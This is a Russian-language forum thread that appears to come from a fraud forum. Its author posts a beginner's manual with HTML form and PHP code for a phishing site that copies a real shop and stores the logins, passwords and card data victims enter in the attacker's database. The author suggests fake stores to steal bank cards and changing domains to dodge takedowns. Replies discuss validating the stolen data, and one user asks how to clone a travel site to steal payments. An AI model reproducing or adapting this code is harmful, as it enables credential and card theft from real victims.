Загрузка...

(МАНУАЛ) Код для ****** Сайта

Тема в разделе Frontend создана пользователем dogyr2222 26 фев 2024. 790 просмотров

1. dogyr2222
    dogyr2222 Автор темы 26 фев 2024 14 23 окт 2023
    [IMG]Всем привет, хочу рассказать, как сделать наипростейший ****** на вашем сайте. Сразу скажу, профессионалы, не кидайтесь в меня тапками. Я прекрасно понимаю, что код не совсем безопасный и можно внедрить SQL инъекцию. В идеале, код нужно немного доработать, а так все работает отлично. Тем более, если вы делаете ****** сайт, то он скорее всего рассчитан на конкретных мамонтов, к примеру, вы хотите сделать ******овый сайт для сбора банковских карточек с мамонтов, фейк магазин ручных часов, например, никто ваш сайт не будет пытаться ломать. А в случае критических проблем с сайтом, всегда можно откатить его, с помощью резервной копии, и поменять домен, что бы никто не совершал атаки на ваш сайт. А если вы хотите максимально защититься от тех же SQL инъекций и прочего, то просто чуть-чуть доработайте этот наипростейший код. Сделать это очень легко, если вам это необходимо, найдите инфу на форумах, все изи. Но я всегда использовал этот элементарный код, и никто не совершал атаки на мой сайт :) :pepeez:

Теперь перейдем к самому ******овому коду.
    И так, допустим вы скопировали чужой сайт, (Если хотите, я могу сделать полное руководство копирования сайта, подключение к MYSQL и.т.д, пишите, если это кому то необходимо, я сделаю руководство.)
    Короче, сайт у вас есть, вы подключили MYSQL, поставили PHPMYADMIN, отлично.
    Представим, что у вас свой сайт, где вы якобы продаете максимально реалистичных резиновых девушек для секса.
    Ваша цель - получить данные карты чувака, который купит на вашем сайте несуществующую резиновую телку :D (Кстати, без рофла, тема реально рабочая, сейчас самых современных секс кукол, почти нереально отличить от реальных девушек, по внешнему виду, имею ввиду, так что многим одиноким работягам понадобится такая секс штучка :)
    И тут я вам помогу украсть данные их карт, или чего угодно, что он будет вводить на вашем сайте.
    Для того, что бы заполненная форма отправлялась в вашу базу данных, нужно будет для начала написать HTML код для того, что бы введенные данные с формы - отправлялись в базу данных. Нам нужно будет так же сделать позже php файл с кодом, но это обьясню потом. Суть такая, вы своим HTML кодом, отправляете запрос в ваш php файл, который и будет отправлять введеные данные в БД.
    Короче, у вас на сайте например есть форма регистрации/авторизации, мы будем собирать сейчас именно логины пароли, которые люди вводят на вашем сайте.

Код
    <form id="regUser" class="form-signin" action="send.php" method="post"> <!-- В этой строчке мы как раз таки и делаем отправку введенных данных в файл send.php который мы сделаем чуть попозже)

<input type="hidden" name="register">

<div class="form-group field-register-login required">

<label class="text-muted" for="register">логин:</label>

<input type="text" id="register-login" class="form-control" name="login" aria-required="true">

<p class="help-block help-block-error"></p>

</div> <div class="form-group field-register-username required">

<label class="text-muted" for="register-username">Ваше имя:</label>

<input type="text" id="register-username" class="form-control" name="login" aria-required="true"> <!-- Обратите внимание на команду "name", тут суть такая, когда чувак на нашем сайте будет заполнять строчку "Ваше имя", введенное имя пойдет в send.php, но отправка будет идти как раз по этому запросу, который указан в name. У нас это "login". -->

<p class="help-block help-block-error"></p>

</div> <div class="form-group field-register-password required">

<label class="text-muted" for="register-password">Пароль:</label>

<input type="password" id="register-password" class="form-control" name="pas" aria-required="true" > <!-- Здесь суть такая же, введенные данные в нашу форму "pas", так же будут идти в send.php -->
    Теперь перейдем к созданию самого SEND.php благодаря которому мы и будем получать данные в нашу БАЗУ ДАННЫХ.

А тут все элементарно! :) Самый простейший код в мире.

Код
    <?php

$login = filter_var(trim($_POST['login']), <!-- Здесь суть такая, нам идут данные с формы "login". Короче говоря, чувак регистрируется на вашем сайте и пишет свой логин, который идет нам. -->

FILTER_SANITIZE_STRING);

$pas = filter_var(trim($_POST['pas']), <!-- Здесь тоже самое, только тут уже нам в наш файл идут данные, которые вводились в форму "pas". На вашем сайте это выглядит как "Введите ваш пароль". Пароль идет нам, это понятно -->

FILTER_SANITIZE_STRING);

$pas2 = filter_var(trim($_POST['pas2']), <!-- Здесь подтверждение пароля, эта форма называется "pas2". А на вашем сайте это выглядит, как обычная форма для регистрации и строка "Введите ваш пароль еще раз" -->

FILTER_SANITIZE_STRING);

$mysql = new mysqli('Айпи адрес вашего сервера', 'логин админки на вашем сайте, которая имеет полный доступ к MYSQL', 'Пароль вашей админки', 'Название самой базы данных, которую вы сделали в phpmyadmin');

$mysql->query("INSERT INTO `ТУТ НАЗВАНИЕ ТАБЛИЦЫ ИЗ ВАШЕЙ БАЗЫ ДАННЫХ` (`login`, `pas`, `pas2`) VALUES('$login', '$login2', '$pas', '$pas2')"); (Тут все просто, введенные данные в формах login pas pas2 идут к вам в бд. То есть нам идут введенные логины, пароли и подтверждения паролей)

$mysql->close();

header('Location: /Тут название вашего основного файла сервера на котором вы делаете ******.html');

?>
    В общем, я понимаю что код конечно школьный :D Но он прекрасно работает, и это главное. Я надеюсь я помог кому-то и вы создадите отличный ******овый сайт. Если вы хотите, что бы я сделал полное руководство создания ******ового сайта, с копированием чужого сайта, подключением к базе данных MYSQL, созданием ******овых форм и прочее, то пишите, я сделаю это руководство, но оно будет очень большим и это на самом деле будет огромный труд, но если будут нуждающиеся, то я сделаю это ради вас, друзья.

Еще раз уточню, я лишь показал ******овый код со СВОЕГО сайта, как делаю я. Не надо писать в комментарии, что код вам не нравится. ЭТО ЧИСТО МОЙ ******ОВЫЙ САЙТ, КОТОРЫЙ ОТЛИЧНО РАБОТАЕТ. Я показал вам пример моего кода. Это руководство чисто для НОВИЧКОВ.

На этом все, если у кого то возникнут вопросы - задавайте, не стесняйтесь.

26 фев 2024 Изменено
  2. eternal
    eternal 26 фев 2024 звёзды от меня https://lolz.live/threads/8939583/ 14 785 2 авг 2018
    прям "******овая")) а слабо после отправки данных сразу чекать на валид?

26 фев 2024 Изменено
    1. dogyr2222 Автор темы
      eternal, Такое я еще не умею)) Я же сказал, мануал чисто для новичков, как я.
    2. dogyr2222 Автор темы
      eternal, Я показал как делаю я. Чем брать на слабо, лучше подскажи как усовершенствовать код, и таким образом ты поможешь людям.
  3. nichind
    nichind 26 фев 2024 блокировка 7506 15 сен 2020
    ничитаемо, код не в кодблоках

1. dogyr2222 Автор темы
    2. морфий
      dogyr2222, мужик, это релаьно нечитаемо, для кода есть это [IMG]
    3. dogyr2222 Автор темы
      морфий, я все исправил. Просто изначально не нашел никакого формата для кода, щас все четко! :D
  4. Монополист
    Монополист 26 фев 2024 https://lolz.live/threads/8640118/ - обмен всего и вся 9724 6 мар 2021
    Зачем эта ЛГБТ радуга в теме? Для кодов свой формат есть

1. Посмотреть предыдущие комментарии (3)
    2. морфий
  5. xxxRaysonxxx
    xxxRaysonxxx 26 фев 2024 24 12 авг 2018

1. dogyr2222 Автор темы
  6. openresty
    openresty 26 фев 2024 ку:surprised_cat: 5171 13 сен 2019
    почему нельзя сразу чекнуть на валид и использовать PDO?

1. dogyr2222 Автор темы
      openresty, расскажи как это сделать. Я в теме все написал, почему все именно вот так, как есть. Если ты можешь усовершенствовать код - то расскажи как, помоги людям.
  7. dogyr2222
    Чуваки, если кому то нужен полноценный мануал по созданию собственного ****** сайта, то обращайтесь, если будет много желающих, я это сделаю. Могу даже видос запилить.

8. dogyr2222
    Видимо мануал по созданию своего ****** сайта никому особо не нужен. Но я все равно его сделаю, назло :D

9. Stasi
    Stasi 26 фев 2024 10 332 12 дек 2017
    Но это просто кусок верстки и запрос к бд...

1. dogyr2222 Автор темы
      Stasi, Да, я могу создать полноценный мануал, но попозже
    2. dogyr2222 Автор темы
      Stasi, Этот код все равно может кому то помочь.
  10. dogyr2222
    Инструкция как защитить сайт от SQL Иньекций

Используйте параметризованные запросы: Используйте параметризованные запросы или предварительно подготовленные выражения вместо вставки значений напрямую в SQL запросы. Это предотвращает возможность внедрения зловредного SQL кода.
    Избегайте динамической генерации SQL запросов: Избегайте конкатенации пользовательских входных данных с SQL запросами. Вместо этого используйте ORM (Object-Relational Mapping) или ORM-подобные библиотеки, которые позволяют вам работать с базой данных через объекты или методы, предоставляемые библиотекой.
    Валидация входных данных: Проверяйте и фильтруйте пользовательский ввод, чтобы убедиться, что он соответствует ожидаемому формату и типу данных. Это поможет предотвратить внедрение нежелательных символов или кода в SQL запросы.
    Используйте ограниченные привилегии базы данных: Убедитесь, что приложение имеет доступ только к тем таблицам и данным, которые ему действительно нужны. Не давайте приложению прав на выполнение ненужных операций или доступ к конфиденциальной информации.
    Обновляйте программное обеспечение и библиотеки: Регулярно обновляйте ваше программное обеспечение, включая сервер базы данных, веб-сервер и используемые библиотеки. Обновления могут содержать исправления уязвимостей, включая те, которые связаны с SQL-инъекциями.
    Логирование и мониторинг: Ведите журнал всех SQL запросов и мониторьте их для выявления необычной активности или попыток внедрения.
    Используйте фаерволы и другие средства безопасности: Используйте фаерволы, интранеты и другие средства безопасности для защиты вашего сервера базы данных от несанкционированного доступа.
    Обучение и обучение сотрудников: Обучите ваших разработчиков и администраторов баз данных о методах и техниках защиты от SQL-инъекций, а также о принципах безопасного программирования.

11. Aragyg
    Aragyg 26 фев 2024 0 26 фев 2024
    1. dogyr2222 Автор темы
  12. spasterr
    spasterr 13 ноя 2024 0 12 ноя 2024
    а есть манул как сделать прямо полноценную копию сайта? я про сложные сайты. К примеру сайт с турами и поездками на которые можно записаться. Ну и сам ****** конечно в оплате этой поездки. Хотелось бы именно шаги для написания такого сайта

1. Russia88
      spasterr, Я бы написал, но это прям не такая простая задача, в нее тот кто не понимает кода не вкатится никогда. Нюансов до жути много.
    2. spasterr
      Russia88, да я сам фулстак считай. Просто именно интересно алгоритм. Такое с нуля верстают и пишут просто спарсив все туры к примеру с оригинала? можешь расписать немного?
Загрузка...